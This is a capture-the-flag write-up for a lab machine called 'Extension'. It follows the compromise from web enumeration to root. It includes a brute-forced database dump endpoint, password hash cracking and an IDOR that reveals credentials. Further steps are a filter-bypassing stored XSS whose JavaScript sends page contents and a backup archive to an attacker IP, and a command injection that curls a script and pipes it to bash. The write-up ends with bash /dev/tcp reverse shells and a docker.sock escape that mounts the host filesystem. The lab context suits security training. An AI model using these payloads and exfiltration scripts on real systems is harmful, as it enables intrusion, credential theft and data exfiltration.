Extension

As always, start off by running nmap:

nmap -sC -sV -oA nmap/ -T4 10.129.4.9

nmap-initial

Ports 22 and 80 are open: 22 is SSH and 80 is HTTP, so the focus should be on port 80.

snippet-frontpage

At first glance, nothing interesting: the "Get started" button redirects to a login page which does not seem to be vulnerable to any injection attacks. The HTML source, on the other hand, is interesting. There is a declared variable Ziggy, which contains information about the application's endpoints:

{
    "url": "http://10.129.4.9",
    "port": null,
    "defaults": {},
    "routes": {
      "ignition.healthCheck": {
        "uri": "_ignition/health-check",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "ignition.executeSolution": {
        "uri": "_ignition/execute-solution",
        "methods": [
          "POST"
        ]
      },
      "ignition.shareReport": {
        "uri": "_ignition/share-report",
        "methods": [
          "POST"
        ]
      },
      "ignition.scripts": {
        "uri": "_ignition/scripts/{script}",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "ignition.styles": {
        "uri": "_ignition/styles/{style}",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "dashboard": {
        "uri": "dashboard",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "users": {
        "uri": "users",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "snippets": {
        "uri": "snippets",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "snippets.view": {
        "uri": "snippets/{id}",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "snippets.update": {
        "uri": "snippets/update/{id}",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "api.snippets.update": {
        "uri": "snippets/update/{id}",
        "methods": [
          "POST"
        ]
      },
      "api.snippets.delete": {
        "uri": "snippets/delete/{id}",
        "methods": [
          "DELETE"
        ]
      },
      "snippets.new": {
        "uri": "new",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "users.validate": {
        "uri": "management/validate",
        "methods": [
          "POST"
        ]
      },
      "admin.management.dump": {
        "uri": "management/dump",
        "methods": [
          "POST"
        ]
      },
      "register": {
        "uri": "register",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "login": {
        "uri": "login",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "password.request": {
        "uri": "forgot-password",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "password.email": {
        "uri": "forgot-password",
        "methods": [
          "POST"
        ]
      },
      "password.reset": {
        "uri": "reset-password/{token}",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "password.update": {
        "uri": "reset-password",
        "methods": [
          "POST"
        ]
      },
      "verification.notice": {
        "uri": "verify-email",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "verification.verify": {
        "uri": "verify-email/{id}/{hash}",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "verification.send": {
        "uri": "email/verification-notification",
        "methods": [
          "POST"
        ]
      },
      "password.confirm": {
        "uri": "confirm-password",
        "methods": [
          "GET",
          "HEAD"
        ]
      },
      "logout": {
        "uri": "logout",
        "methods": [
          "POST"
        ]
      }
    }
  }
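
To pull this object out without scrolling through the page source by hand, something like the following works (a rough sketch; it assumes the object is embedded inline as Ziggy = {...}):

# Quick-and-dirty extraction of the inline Ziggy route map
curl -s http://10.129.4.9/ | grep -o 'Ziggy *= *{.*'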

A lot of stuff to enumerate. Probably the juiciest endpoint is management/dump, since the naming suggests that it dumps something from the app or system. A GET request responds with 405 Method Not Allowed, but how about POST?
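
Poking the endpoint directly is easy enough. A minimal sketch (being a Laravel app, it may also want the session cookie and X-XSRF-TOKEN header used in the wfuzz command further down):

# Probe management/dump with a POST and an empty JSON body; -i shows the status line
curl -s -i -X POST http://10.129.4.9/management/dump \
     -H "Content-Type: application/json" \
     -d '{}'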

management-dump-1

Interesting, there are no authorization errors, just a message about missing arguments. Time for some good old brute force!

Wfuzz is a good tool for this job. Crafting the payload is a bit tricky since the app seems to use tokens to validate the user session. Also, we have no idea what the app responds with for a correct payload, so we only skip requests that contain the text "Missing arguments". A functional command is:

wfuzz -H "X-Inertia: true" -H "X-Inertia-Version: 207fd484b7c2ceeff7800b8c8a11b3b6" \
-H "X-XSRF-TOKEN: eyJpdiI6Im9nRjF3SmpTOWltYnNRQ1FRWHhIZlE9PSIsInZhbHVlIjoia01tZG94MXVlSzBpbXluOUw4ZGQwRHUzQXhyZ000dWpLQ0xQQ2NZMEdwUWpid3J5VFlGb1lEbDI1TG1sbW9naWdRR1FVcXhMYWl0Y0lwRks4NDhqdzBFZWZZbEhpVDM0UFVPYkl6ZEdEOTA4K3ZhendwbDE1MUNZalovazdHbC8iLCJtYWMiOiIwOGZlODJiYTBmYzQzOWUwZWM1NjE3YWVmMDg5ZGVkOTQ0NGQ0ZjlhNTU0M2FjZDg1MWYxNGM4ZTQzOWY2YzA3IiwidGFnIjoiIn0" \
-b "XSRF-TOKEN=eyJpdiI6Im9nRjF3SmpTOWltYnNRQ1FRWHhIZlE9PSIsInZhbHVlIjoia01tZG94MXVlSzBpbXluOUw4ZGQwRHUzQXhyZ000dWpLQ0xQQ2NZMEdwUWpid3J5VFlGb1lEbDI1TG1sbW9naWdRR1FVcXhMYWl0Y0lwRks4NDhqdzBFZWZZbEhpVDM0UFVPYkl6ZEdEOTA4K3ZhendwbDE1MUNZalovazdHbC8iLCJtYWMiOiIwOGZlODJiYTBmYzQzOWUwZWM1NjE3YWVmMDg5ZGVkOTQ0NGQ0ZjlhNTU0M2FjZDg1MWYxNGM4ZTQzOWY2YzA3IiwidGFnIjoiIn0%3D;snippethtb_session=eyJpdiI6Ik9LdlVlOWNPS1lLaVp1emJiNUI3U3c9PSIsInZhbHVlIjoiUVZuVnJjbVRmRk9yNXFWeUMyRS93TSs1OXVqbWNKV1ZNOU5jM2luR0dvNzN6VVc4M0I2dzlMelQ4WHBGNS90Y2phRExUdXQ4bkp3STdSUDMxOWw0WWpsRzNuSmpMUU5CKzVmZGZRQ25WNi9XMUI2TzJRMWx2ZEN1TXB4NytqOFUiLCJtYWMiOiI0OTNjNjdlNjJmMTQ4NWQ5MzZiNGQ0Y2I0ODlmNjFlY2JiYjNhY2Q4N2EwMjgzMjhhNmVjOWM0NGFiYzM0MjkxIiwidGFnIjoiIn0%3D" \
-w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt \
-d  "{\"_method\": \"post\", \"FUZZ\": \"ASD\" }" \
--hs "Missing arguments" -H "Content-Type: application/json" \
http://snippet.htb/management/dump

The scan reveals that download seems to be the correct key for the payload, but the value is still wrong.

management-dump-2

Guessing the correct value is not that hard, since usually the most interesting thing in a database is the users, and the table name is usually something like that. After changing the value to users the API returns the user table, which is quite large, so I will not display it here.
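
For reference, the final working request looks roughly like this (reuse the cookie and XSRF headers from the wfuzz command if the app complains):

# Dump the users table and save the response for the next step
curl -s -X POST http://snippet.htb/management/dump \
     -H "Content-Type: application/json" \
     -d '{"download": "users"}' -o users.json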

The dump contains password hashes, so the next step is to try to crack them using hashcat. Extract the passwords from the list with:

const passwords = users.map((user) => user.password)

and save the output to a file. After that, run hashcat with:

.\hashcat.exe .\hash.txt .\rockyou.txt -m 1400

Note: as always, I run hashcat on my Windows host-machine since hashcat is MUCH faster with an actual GPU.

Only one password is cracked:

hashcat-results

This password belongs to user juliana@snippet.htb.

After logging in as juliana we get access to the application. The Dashboard and Members pages don't seem interesting, but Snippets contains something new.

snippets-initial

One initial thing I noticed is that snippets are queryable with a URL parameter, and it is actually possible to see some fields of other users' snippets, but the actual content field is filtered out:

snippets-2

Let's try to interact with the application more by creating our own snippets:

snippets-new

Interesting, there is a public field which probably determines whether a snippet is private or viewable by other users. After creating a snippet, let's try to edit it, but capture the request with Burp Suite. Since there was already one authorization vulnerability, let's try that angle again: instead of editing the snippet we just created, change the id parameter to the previously hidden snippet and make it public:
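
In practice it is easiest to just change the id and the public flag in the intercepted Burp request, but replayed as a standalone request it looks roughly like this (the target id and the JSON field names are assumptions based on the form):

# Rough sketch of the IDOR update; <cookie>/<token> come from the logged-in session,
# "2" and the field names are assumptions based on the snippet form
curl -s -X POST http://snippet.htb/snippets/update/2 \
     -b "snippethtb_session=<cookie>" \
     -H "X-XSRF-TOKEN: <token>" \
     -H "Content-Type: application/json" \
     -d '{"title": "dummy", "content": "dummy", "public": true}'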

snippet-edit-success

It seems that our request went through. Let's see whether we can now read the content of the snippet:

snippet-2-revealed

A new subdomain is revealed to us, together with a basic auth header. Basic auth is essentially the username and password separated by a colon and then base64-encoded. It can be decoded by running:

echo amVhbjpFSG1mYXIxWTdwcEE5TzVUQUlYblluSnBB |base64 -d
jean:EHmfar1Y7ppA9O5TAIXnYnJpA

http://dev.snippet.htb/ has a Gitea service running (remember to add dev.snippet.htb to /etc/hosts first). Gitea is basically an alternative to GitHub or GitLab. After logging in as jean there is one repository, which contains some kind of extension for Gitea:

gitea-extension-1

Since this is a CTF after all, the README heavily suggests that someone is using this extension, which indicates that the next step is related to XSS. Let's analyze the source code:

const list = document.getElementsByClassName("issue list")[0];

const log = console.log

if (!list) {
    log("No gitea page..")
} else {

    const elements = list.querySelectorAll("li");

    elements.forEach((item, index) => {

        const link = item.getElementsByClassName("title")[0]

        const url = link.protocol + "//" + link.hostname + "/api/v1/repos" + link.pathname

        log("Previewing %s", url)

        fetch(url).then(response => response.json())
            .then(data => {
                let issueBody = data.body;

                const limit = 500;
                if (issueBody.length > limit) {
                    issueBody = issueBody.substr(0, limit) + "..."
                }

                issueBody = ": " + issueBody

                issueBody = check(issueBody)

                const desc = item.getElementsByClassName("desc issue-item-bottom-row df ac fw my-1")[0]

                desc.innerHTML += issueBody

            });

    });
}

/**
 * @param str
 * @returns {string|*}
 */
function check(str) {

    // remove tags
    str = str.replace(/<.*?>/, "")

    const filter = [";", "\'", "(", ")", "src", "script", "&", "|", "[", "]"]

    for (const i of filter) {
        if (str.includes(i))
            return ""
    }

    return str

}

The "extension" seems to be checking repositorys issues, doing some checks and then adding them to html.

                 desc.innerHTML += issueBody

Generally speaking, innerHTML is a property that should never be assigned unsanitized user input, since it opens the door to XSS. There are some checks here, but they are bypassable:

function check(str) {

    // remove tags
    str = str.replace(/<.*?>/, "")

    const filter = [";", "\'", "(", ")", "src", "script", "&", "|", "[", "]"]

    for (const i of filter) {
        if (str.includes(i))
            return ""
    }

    return str

}

The first part removes a tag from the string, but since the regex has no global flag it only removes the first match, so it can be bypassed by simply prepending the payload with <<> (the sacrificial tag gets stripped and the real one survives). The blacklist filter can be bypassed in many ways: for example, the check looks for the literal lowercase string "src", so srC slips through, and srC is still valid HTML because attribute names are case-insensitive. Parentheses are not an issue either, since in JavaScript you can call functions with tagged template literals (backticks) instead of parentheses. One possible payload for bypassing this is:

 <<><img srC="http://10.10.14.64:8000/asd" onerror=jQuery.getScript`http://10.10.14.64:8000/dummy.js` />

Basically, this tag tries to load an image from a path that does not exist, which triggers the onerror handler. Gitea ships jQuery by default, which makes retrieving a custom script from an external source a little easier; in this case, the error handler loads a script called dummy.js. Before going further, set up a web server with the following command:

python3 -m http.server

and create a file called dummy.js. Next, use the earlier payload to create an issue on the extension repository and wait (approx. one minute) until "another user" comes to check your issue and triggers the payload.

Note: There will be three parts: 1) enumerate repositories, 2) enumerate repository contents, 3) retrieve repo files.

I will iterate on dummy.js for each part and will not display the contents of each result. Each part works on the same principle: it sends the whole body content of the page, as seen by the victim user, back to us as a base64-encoded URL parameter.

The first part of dummy.js will be:

async function part1() {
    const req = await fetch("http://dev.snippet.htb/explore/repos")
    const data = await req.text()
    const based = btoa(unescape(encodeURIComponent(data)))
    fetch("http://10.10.14.64:8000/?body="+based)
}

part1()
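
The base64 blob lands in the python web server's access log as a query-string value; decoding it is straightforward (a sketch, assuming you copied the value into body.b64):

# Decode the exfiltrated page and skim it for repository links
base64 -d body.b64 > explore.html
grep -o 'href="[^"]*"' explore.html | sort -u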

This reveals that the user has another repository called /charlie/backups/

For the next part, update the dummy.js content to:

async function part2() {
  const req = await fetch("http://dev.snippet.htb/charlie/backups/")
  const data = await req.text()
  const based = btoa(unescape(encodeURIComponent(data)))
  fetch("http://10.10.14.64:8000/?body="+based)
}

part2()

This reveals the files of the repository. The repo has only one file, backup.tar.gz. The next and last step is to retrieve it; update the dummy.js content to:

function blobToBase64(blob) {
    return new Promise((resolve, _) => {
        const reader = new FileReader();
        reader.onloadend = () => resolve(reader.result);
        reader.readAsDataURL(blob);
    });
}

async function part3() {
    const req = await fetch("http://dev.snippet.htb/charlie/backups/raw/branch/master/backup.tar.gz")
    const data = await req.blob()
    const based = await blobToBase64(data)
    // const based = btoa(unescape(encodeURIComponent(data)))
    fetch("http://10.10.14.64:8000/?body=" + based)
}

part3()
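
This time the exfiltrated value is a data URL (data:application/gzip;base64,...), so strip the prefix before decoding. A quick sketch, assuming the logged value was saved to backup.b64:

# Strip the data-URL prefix, decode the archive and unpack it
sed 's/^data:[^,]*,//' backup.b64 | base64 -d > backup.tar.gz
tar xzf backup.tar.gz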

After receiving and extracting the backup archive, it's time to check what it includes. It seems to be a backup of the charlie user's home folder, which also contains SSH keys! After fixing the key's permissions (chmod 600 id_rsa), we have access to the machine:

ssh -i id_rsa charlie@snippet.htb

There seems to be another user on the machine called jean. We also have access to jean's home folder, and user.txt resides there, but we can't read it. Interestingly, there's also a file called .git-credentials which contains the password for jean.

charlie-to-jean-gg

In jean's home folder there's also a projects folder which contains the source code of the previously seen snippets application. The application is built on Laravel, a PHP framework. After enumerating the source code, there seems to be an attack vector in AdminController's validateEmail function:

class AdminController extends Controller
{

    /**
     * @throws ValidationException
     */
    public function validateEmail(Request $request)
    {
        $sec = env('APP_SECRET');

        $email = urldecode($request->post('email'));
        $given = $request->post('cs');
        $actual = hash("sha256", $sec . $email);

        $array = explode("@", $email);
        $domain = end($array);

        error_log("email:" . $email);
        error_log("emailtrim:" . str_replace("\0", "", $email));
        error_log("domain:" . $domain);
        error_log("sec:" . $sec);
        error_log("given:" . $given);
        error_log("actual:" . $actual);

        if ($given !== $actual) {
            throw ValidationException::withMessages([
                'email' => "Invalid signature!",
            ]);
        } else {
            $res = shell_exec("ping -c1 -W1 $domain > /dev/null && echo 'Mail is valid!' || echo 'Mail is not valid!'");
            return Redirect::back()->with('message', trim($res));
        }

    }
}

Basically, the email is split at the @ sign and the last part is used as the address to ping. We could execute code by injecting shell commands instead of a real domain into that field. There's also a checksum check involving the APP_SECRET environment variable, to which we have no access, but luckily the cs field is generated automatically when the user is fetched from the database. This can be seen in the User model in app/Models/User.php:

public function getCsAttribute()
{
    $sec = env('APP_SECRET');

    return hash('sha256', $sec . $this->attributes['email']);
}

None of this is helpful yet, since exploiting it requires admin access to the app. The environment variables are also not exposed in the source code; they could have been useful, for example, for accessing the database. Time to enumerate some more.

Let's run pspy on the machine to see what's going on.

pspy-mysql-pw

After running pspy for a while, there is a command that exposes MySQL credentials. MySQL seems to be running in a separate Docker container and the machine doesn't have a mysql client installed, so we need to create a tunnel and access MySQL from the local machine. Create the tunnel with:

ssh -i id_rsa charlie@snippet.htb -L 33006:127.0.0.1:3306

Now, we can access MySQL through localhost:33006.
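
Connect through the tunnel with the credentials pspy leaked (shown as placeholders here, since the actual values come from the pspy output):

# Connect to the dockerised MySQL instance through the SSH tunnel
mysql -h 127.0.0.1 -P 33006 -u <user> -p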

There seems to be only one application database: webapp.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| webapp             |
+--------------------+

To find admin users, execute the following query:

select * from users where user_type != "Member"; 

This reveals only one admin user: charlie, with user id 1. Let's change charlie's password to password123:

update users set password = "ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f" where id = 1;
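
The long hex value is simply the SHA-256 of password123, matching the format of the hashes we cracked earlier with -m 1400. It can be generated with:

# SHA-256 of the new password, in the same format the app stores
echo -n "password123" | sha256sum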

After logging in as charlie, there's a validate button on the Members view:

charlie-validate

Before executing validate, let's modify Kaleigh Lehner's email address to inject code. The only reason for picking Kaleigh is that it's the first entry on the list.

update users set email = "test@10.10.14.64;curl${IFS}10.10.14.64:8000/shell.sh${IFS}|bash" where name = "Kaleigh Lehner";

This payload basically curls a shell.sh file from our web server and executes it right after. I'm using ${IFS} instead of spaces since I had issues with spaces. Add a file called shell.sh, containing a reverse shell, to the same folder where your local Python web server is running (from the XSS step), for example:

bash -i >& /dev/tcp/10.10.14.64/9001 0>&1

Next, set up an nc listener on port 9001:

nc -lnvp 9001

Now, execute the validate command on Kaleigh and we have a shell! Note that we are now inside a Docker container. After a quick enumeration there's a docker.sock file in the /app folder. Quick googling about that file revealed that it's used to manage containers and that it can be abused to mount the host's root filesystem! Basically, we create a new Docker container and start it with a command that gives us a reverse shell. The steps are: 1) query the available Docker images, 2) set the cmd to execute, 3) create a container from an available image with the cmd we just set, and 4) start the container we just created. The commands are copied from https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25 and modified slightly to match the machine's paths and containers.

To check the available images, let's run:

 curl -s --unix-socket /app/docker.sock http://localhost/images/json

 [
    {
      "Containers": -1,
      "Created": 1656086146,
      "Id": "sha256:b97d15b16a2172a201a80266877a65a44b0d7fa31c29531c20cdcc8e98c2d227",
      "Labels": {
        "io.webdevops.layout": "8",
        "io.webdevops.version": "1.5.0",
        "maintainer": "info@webdevops.io",
        "vendor": "WebDevOps.io"
      },
      "ParentId": "sha256:762bfd88e0120a1018e9a4ccbe56d654c27418c7183ff4a817346fd2ac8b69af",
      "RepoDigests": null,
      "RepoTags": [
        "laravel-app_main:latest"
      ],
      "SharedSize": -1,
      "Size": 1975239137,
      "VirtualSize": 1975239137
    },
    {
      "Containers": -1,
      "Created": 1655515586,
      "Id": "sha256:ca37554c31eb2513cf4b1295d854589124f8740368842be843d2b4324edd4b8e",
      "Labels": {
        "io.webdevops.layout": "8",
        "io.webdevops.version": "1.5.0",
        "maintainer": "info@webdevops.io",
        "vendor": "WebDevOps.io"
      },
      "ParentId": "",
      "RepoDigests": null,
      "RepoTags": [
        "webdevops/php-apache:7.4"
      ],
      "SharedSize": -1,
      "Size": 1028279761,
      "VirtualSize": 1028279761
    },
    {
      "Containers": -1,
      "Created": 1640902141,
      "Id": "sha256:6af04a6ff8d579dc4fc49c3f3afcaef2b9f879a50d8b8a996db2ebe88b3983ce",
      "Labels": {
        "maintainer": "Thomas Bruederli <thomas@roundcube.net>"
      },
      "ParentId": "",
      "RepoDigests": [
        "roundcube/roundcubemail@sha256:f5b054716e2fdf06f4c5dbee70bc6e056b831ca94508ba0fc1fcedc8c00c5194"
      ],
      "RepoTags": [
        "roundcube/roundcubemail:latest"
      ],
      "SharedSize": -1,
      "Size": 612284073,
      "VirtualSize": 612284073
    },
    {
      "Containers": -1,
      "Created": 1640805761,
      "Id": "sha256:c99e357e6daee694f9f431fcc905b130f7a246d8c172841820042983ff8df705",
      "Labels": null,
      "ParentId": "",
      "RepoDigests": [
        "composer@sha256:5e0407cda029cea056de126ea1199f351489e5835ea092cf2edd1d23ca183656"
      ],
      "RepoTags": [
        "composer:latest"
      ],
      "SharedSize": -1,
      "Size": 193476514,
      "VirtualSize": 193476514
    },
    {
      "Containers": -1,
      "Created": 1640297121,
      "Id": "sha256:cec4e9432becb39dfc2b911686d8d673b8255fdee4a501fbc1bda87473fb479d",
      "Labels": {
        "org.opencontainers.image.authors": "The Docker Mailserver Organization on GitHub",
        "org.opencontainers.image.description": "A fullstack but simple mail server (SMTP, IMAP, LDAP, Antispam, Antivirus, etc.). Only configuration files, no SQL database.",
        "org.opencontainers.image.documentation": "https://github.com/docker-mailserver/docker-mailserver/blob/master/README.md",
        "org.opencontainers.image.licenses": "MIT",
        "org.opencontainers.image.revision": "061bae6cbfb21c91e4d2c4638d5900ec6bee2802",
        "org.opencontainers.image.source": "https://github.com/docker-mailserver/docker-mailserver",
        "org.opencontainers.image.title": "docker-mailserver",
        "org.opencontainers.image.url": "https://github.com/docker-mailserver",
        "org.opencontainers.image.vendor": "The Docker Mailserver Organization",
        "org.opencontainers.image.version": "refs/tags/v10.4.0"
      },
      "ParentId": "",
      "RepoDigests": [
        "mailserver/docker-mailserver@sha256:80d4cff01d4109428c06b33ae8c8af89ebebc689f1fe8c5ed4987b803ee6fa35"
      ],
      "RepoTags": [
        "mailserver/docker-mailserver:latest"
      ],
      "SharedSize": -1,
      "Size": 560264926,
      "VirtualSize": 560264926
    },
    {
      "Containers": -1,
      "Created": 1640059378,
      "Id": "sha256:badd93b4fdf82c3fc9f2c6bc12c15da84b7635dc14543be0c1e79f98410f4060",
      "Labels": {
        "maintainer": "maintainers@gitea.io",
        "org.opencontainers.image.created": "2021-12-21T03:59:32Z",
        "org.opencontainers.image.revision": "877040e6521e48c363cfe461746235dce4ab822b",
        "org.opencontainers.image.source": "https://github.com/go-gitea/gitea.git",
        "org.opencontainers.image.url": "https://github.com/go-gitea/gitea"
      },
      "ParentId": "",
      "RepoDigests": [
        "gitea/gitea@sha256:eafb7459a4a86a0b7da7bfde9ef0726fa0fb64657db3ba2ac590fec0eb4cdd0c"
      ],
      "RepoTags": [
        "gitea/gitea:1.15.8"
      ],
      "SharedSize": -1,
      "Size": 148275092,
      "VirtualSize": 148275092
    },
    {
      "Containers": -1,
      "Created": 1640055479,
      "Id": "sha256:dd3b2a5dcb48ff61113592ed5ddd762581be4387c7bc552375a2159422aa6bf5",
      "Labels": null,
      "ParentId": "",
      "RepoDigests": [
        "mysql@sha256:20575ecebe6216036d25dab5903808211f1e9ba63dc7825ac20cb975e34cfcae"
      ],
      "RepoTags": [
        "mysql:5.6"
      ],
      "SharedSize": -1,
      "Size": 302527523,
      "VirtualSize": 302527523
    },
    {
      "Containers": -1,
      "Created": 1639694686,
      "Id": "sha256:0f7cb85ed8af5c33c1ca00367e4b1e4bfae6ec424f52bb04850af73fb19831d7",
      "Labels": null,
      "ParentId": "",
      "RepoDigests": [
        "php@sha256:6eb4c063a055e144f4de1426b82526f60d393823cb017add32fb85d79f25b62b"
      ],
      "RepoTags": [
        "php:7.4-fpm-alpine"
      ],
      "SharedSize": -1,
      "Size": 82510913,
      "VirtualSize": 82510913
    }
  ]

There are many options to use; let's go with composer in our case. Before that, let's declare the command to run when the container starts:

 cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.14.64/9002 0<&1'\\\"\"]"

Next, let's create our container:

 curl -s -X POST --unix-socket /app/docker.sock -d "{\"Image\":\"composer\",\"cmd\":$cmd,\"Binds\":[\"/:/tmp:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create?name=peterpwn_root 
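
If you want to confirm the container actually got created before starting it, the same socket can list all containers (a quick sanity check, not strictly required):

# List all containers (including stopped ones) and look for peterpwn_root
curl -s --unix-socket /app/docker.sock "http://localhost/containers/json?all=true"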

Before the last step, set up another netcat listener on the local machine, this time on port 9002:

 nc -lnvp 9002

Finally, start the container we just created:

 curl -s -X POST --unix-socket /app/docker.sock "http://localhost/containers/peterpwn_root/start"

After that, a root shell spawns and the machine is COMPLETED!

To be continued